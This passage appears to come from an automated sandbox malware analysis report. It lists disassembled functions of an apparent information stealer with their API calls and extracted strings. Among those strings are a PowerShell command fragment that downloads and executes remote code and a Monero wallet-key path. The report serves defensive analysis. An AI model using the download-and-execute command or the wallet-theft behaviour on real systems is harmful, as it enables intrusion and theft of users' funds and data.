                              • lstrcat.KERNEL32(?,008DD0B8), ref: 00D4486F
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D48D90: GetFileAttributesA.KERNEL32(00000000,?,00D31B54,?,?,00D5564C,?,?,00D50E1F), ref: 00D48D9F
                                • Part of subcall function 00D44570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D44580
                                • Part of subcall function 00D44570: RtlAllocateHeap.NTDLL(00000000), ref: 00D44587
                                • Part of subcall function 00D44570: wsprintfA.USER32 ref: 00D445A6
                                • Part of subcall function 00D44570: FindFirstFileA.KERNEL32(?,?), ref: 00D445BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: fa0c21dca2792c8089cc7541b335d8ae4b680f8649a7830b40f09637ec973265
                              • Instruction ID: cbdca2e526c23221ac579e98c5fd5e19b95147cbfaace7e5a6be44092c5b7088
                              • Opcode Fuzzy Hash: fa0c21dca2792c8089cc7541b335d8ae4b680f8649a7830b40f09637ec973265
                              • Instruction Fuzzy Hash: E5313EB694021CABCB14FBA0DC85EED7378AB98700F404589B35996081EE7496C9DFB6
                              Function 00D42C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00D42D85
                              Strings
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00D42D04
                              • ')", xrefs: 00D42CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00D42CC4
                              • <, xrefs: 00D42D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 4be129be25f13c3852b033398364797d2033d1be61a78656fdfb82cc139fb60b
                              • Instruction ID: 76a403fec2088b30f03c214b8685a66899c9ec4ce88e5532f81a417a58e24f91
                              • Opcode Fuzzy Hash: 4be129be25f13c3852b033398364797d2033d1be61a78656fdfb82cc139fb60b
                              • Instruction Fuzzy Hash: 7241AA71C502189BEB14EBA4C892BEDBB78EF14304F504119F516A7192EF746A4ACFB2
                              Function 00D39E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00D39F41
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 3cd94db32c79b005f9dd0148e033d043dc94c8a9308a7b91861564a9bcf53089
                              • Instruction ID: 7f8ead452830c6786b531979cc76e82eb23c7d8d4709056dcca56bcb3a3d31b3
                              • Opcode Fuzzy Hash: 3cd94db32c79b005f9dd0148e033d043dc94c8a9308a7b91861564a9bcf53089
                              • Instruction Fuzzy Hash: 7F612F75A502489FDB28EFA8CC96FED7775EF44304F008118F90A5B195EB74AA09CB72
                              Function 00D440B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,008DD238,00000000,00020119,?), ref: 00D440F4
                              • RegQueryValueExA.ADVAPI32(?,008DDE78,00000000,00000000,00000000,000000FF), ref: 00D44118
                              • RegCloseKey.ADVAPI32(?), ref: 00D44122
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44147
                              • lstrcat.KERNEL32(?,008DDE48), ref: 00D4415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 2bc862e23049522353f557efbe5a534fc225ec1847c73ec0f35945cba9fd7dcf
                              • Instruction ID: 11dcba6ed4d712a5339298d4114b35f22c812935002097a905f20414dc60dc9a
                              • Opcode Fuzzy Hash: 2bc862e23049522353f557efbe5a534fc225ec1847c73ec0f35945cba9fd7dcf
                              • Instruction Fuzzy Hash: 8C4136B690010C6BDB14FBA0DC56FEE737DEB88300F404558B61A96181EA755BC89BB3
                              Function 00D46920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00D4696C
                              • sscanf.NTDLL ref: 00D46999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D469B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D469C0
                              • ExitProcess.KERNEL32 ref: 00D469DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: e5f1286be4eeeac802f26d9a9dd0655b6998e43d7a396e129cfca5319dd328c9
                              • Instruction ID: c362a15fb8cab86a497a5ea3b8dd9283ffed275551dd6f365caa3312409891c6
                              • Opcode Fuzzy Hash: e5f1286be4eeeac802f26d9a9dd0655b6998e43d7a396e129cfca5319dd328c9
                              • Instruction Fuzzy Hash: 7121BA75D1420CABCF04EFE8E9459EEB7B5FF48300F04852AE41AA3250EB749645DB66
                              Function 00D47E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D47E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,008CBB60,00000000,00020119,?), ref: 00D47E5E
                              • RegQueryValueExA.ADVAPI32(?,008DD198,00000000,00000000,000000FF,000000FF), ref: 00D47E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00D47E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: caa41c43f4dbb1aaea3dce848c0348d0078d81c9383eaa56b55aaf687f4829ce
                              • Instruction ID: 8db298208410da85f1af5db1dc7e038a3dfafeaada69439b69b4d8b6882efeda
                              • Opcode Fuzzy Hash: caa41c43f4dbb1aaea3dce848c0348d0078d81c9383eaa56b55aaf687f4829ce
                              • Instruction Fuzzy Hash: D31191B1A44209EBD704CF94DC49FBFBBB8EB44701F104269FA19A7280D77458009BB2
                              Function 00D49260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(008DDBC0,?,?,?,00D4140C,?,008DDBC0,00000000), ref: 00D4926C
                              • lstrcpyn.KERNEL32(00F7AB88,008DDBC0,008DDBC0,?,00D4140C,?,008DDBC0), ref: 00D49290
                              • lstrlen.KERNEL32(?,?,00D4140C,?,008DDBC0), ref: 00D492A7
                              • wsprintfA.USER32 ref: 00D492C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 6213edee1f0e4e9a71eb97b2dc816c4d7381815e42be341e39e70885bca387df
                              • Instruction ID: bd621b90faaab6e2a49f72188de5a4307ad749fdf73b48cf2b1533522225b596
                              • Opcode Fuzzy Hash: 6213edee1f0e4e9a71eb97b2dc816c4d7381815e42be341e39e70885bca387df
                              • Instruction Fuzzy Hash: 5701E97550010CFFCB04DFECC994EAE7BB9EB84351F118188F9098B201C671AA50EBA2
                              Function 00D312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                              • RegCloseKey.ADVAPI32(?), ref: 00D312FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 1ec3c674cf6d7e5cfd72ab8a12863bd5356a7d04b8175aaf380712dbc6a5cffa
                              • Instruction ID: 8d393aeefcad8b54cfaff967a2e5df8a4739ea223602a029ee273b1eff2ae1b5
                              • Opcode Fuzzy Hash: 1ec3c674cf6d7e5cfd72ab8a12863bd5356a7d04b8175aaf380712dbc6a5cffa
                              • Instruction Fuzzy Hash: 8E01E1B9A4020DBBDB04DFE4DC49FAEB7B8EB88701F108159FA0997280D6759A419F52
                              Function 00D4C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 50624b672602926a83db4c49491de4d445c4b15159d5ed60aca8b40d87e7f902
                              • Instruction ID: 750c12d1e4d508ec4c173a4c103f900d5c625beca94444c4c11e705e434601c8
                              • Opcode Fuzzy Hash: 50624b672602926a83db4c49491de4d445c4b15159d5ed60aca8b40d87e7f902
                              • Instruction Fuzzy Hash: 6941077111179C6FDB218B24CC84FFBBBE99F45705F1854E8E9CA86182E2719A44CF70
                              Function 00D46630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00D46663
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00D46726
                              • ExitProcess.KERNEL32 ref: 00D46755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 0fe456ca2b449961d4d16b66e97028195031b05e726f8f2037db438b4137bfdf
                              • Instruction ID: dacd898773cd9186cf43087a30bfd6579d8a87000d8e108e99bd1adf535b8d16
                              • Opcode Fuzzy Hash: 0fe456ca2b449961d4d16b66e97028195031b05e726f8f2037db438b4137bfdf
                              • Instruction Fuzzy Hash: 38310CB1841218ABEB14EBA4DC96FDEB778EF44300F404199F20966191DF746B89CF76
                              Function 00D487C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
